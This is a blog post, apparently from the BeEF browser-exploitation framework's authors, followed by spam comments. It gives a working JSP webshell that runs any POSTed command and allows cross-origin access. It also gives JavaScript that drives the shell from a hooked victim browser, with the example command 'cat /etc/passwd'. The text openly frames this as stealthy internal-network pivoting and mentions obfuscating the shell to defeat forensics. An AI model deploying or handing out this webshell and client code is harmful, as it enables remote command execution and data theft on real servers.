This works fine when you want to use our BeEF Bind custom shellcode to exploit compiled software (kudos to our friend Ty Miller), but what can you do if you're able to upload a webshell to the target and you want bi-directional communication with that from the hooked browser?
If your target is a Java Application Server, for instance JBoss or GlassFish (see the exploits we ported to BeEF for both of them, inside the exploit directory), you can deploy the following JSP shell I wrote for that purpose.
In the BeEF project, we're obsessed with doing bad stuff entirely from the hooked browser, using it as a beachhead for launching attacks. One thing we usually exploit is the possibility to work directly in the internal network of the hooked browser. We effectively use the browser as a pivot point for further internal network pwnage. Unline with a normal pentest scenario, we can do this without even touching the file system or the memory of some processes.
If you're a frequent reader of our blog, you would probably remember Revitalizing the Inter-Protocol Exploitation with BeEF Bind, the post I wrote after RuxCon 2012. The whole idea of the technique described in that post was to bi-directionally interact with custom shellcode from the hooked browser. Such approach removes the need to open a reverse connection back to your attacker server, or to connect to the bind shell from a fully compromised machine (in the internal network). OS commands are sent by the hooked browser cross-domain using XMLHttpRequest and command results are appended in the HTTP response.
Let's take a look at code:
<%@ page import="java.util.*,java.io.*"%>
<%
// needed for cross-domain communication
response.setHeader("Access-Control-Allow-Origin", "*");
try{
// needed for handling text/plain data
BufferedReader br = request.getReader();
String line = br.readLine();
if(line != null){
String[] cmds = line.split("cmd=");
if(cmds.length > 0){
String cmd = cmds[1];
//executes the command
Process p = Runtime.getRuntime().exec(cmd);
// reads the command output
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while(disr != null){
out.println(disr);
disr = dis.readLine();
}
}
}}catch(Exception e){
out.println("Exception!!");
}
%>
Obviously, to defeat forensics, you might want to improve it adding polymorphism and obfuscation, but this is currently out of scope :D
Now, in order to re-create the same behavior of the BeEF Bind shellcode, we need the following requirements in our webshell:
Now, in order to re-create the same behavior of the BeEF Bind shellcode, we need the following requirements in our webshell:
- every HTTP response must contain Allow-Access-From-Origin: * to allow bi-directional cross-domain communication with the hooked browser;
- the JSP page must accept a POST request (Content-type text/plain) with a cmd parameter, which holds the command that will be executed;
- the output of the executed command must be returned in the HTTP response.
The JSP webshell satisfies all the previous requirements, as you can read from the code. I used request.getReader() because I wanted to parse a text/plain request rather than the default application/x-www-form-urlencoded Content-type.
You can interact with the webshell cross-domain from the hooked browser with the following code:
var uri = "http://your_target";
var port = 8080;
var path = "BeEF_Bind.jsp";
var cmd = "cat /etc/passwd"
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
console.log(xhr.responseText);
}
}
xhr.open("POST", uri + ":" + port + "/" + path, true);
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.setRequestHeader('Accept','*/*');
xhr.setRequestHeader("Accept-Language", "en");
xhr.send("cmd=" + cmd);
 |
| BeEF Screenshot |
Obviously, you can achieve the same results porting this code to ASP, ASP.NET, PHP and every other language you want. In this way you can exclusively use the hooked browser for both exploiting the vulnerability that leads to the webshell deployment, and to fully interact with it being stealthier, potentially controlling a system in the hooked browser internal network.
Have fun with it!
anisnatchor
excellent work
ReplyDeleteI have read your blog its very attractive and impressive. I like it your blog.
ReplyDeleteJava Training in Chennai Core Java Training in Chennai Core Java Training in Chennai
Java Online Training Java Online Training JavaEE Training in Chennai Java EE Training in Chennai
Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging. If anyone wants to become a Front end developer learn thru JavaScript Online Training India. Nowadays JavaScript has tons of job opportunities on various vertical industry.
ReplyDeleteI had doubts about my code until I learned a dozen blogs. Yours is one of them. My pay someone to write my essay site will soon be aired. Thank you for your assistance.
ReplyDeleteSome information about phone tracking applications you could find here. Its actually a pretty useful stuff that you could use on daily basis
ReplyDeletehappy wheels online features hilariously gruesome racing action. Survive wild courses without losing your limbs
ReplyDeleteThanks for the post, I am techno savvy. I believe you hit the nail right on the head. I am highly impressed with your blog.
ReplyDeleteIt is very nicely explained. Your article adds best knowledge to our Java Online Training from India.
or learn thru Java Online Training from India Students.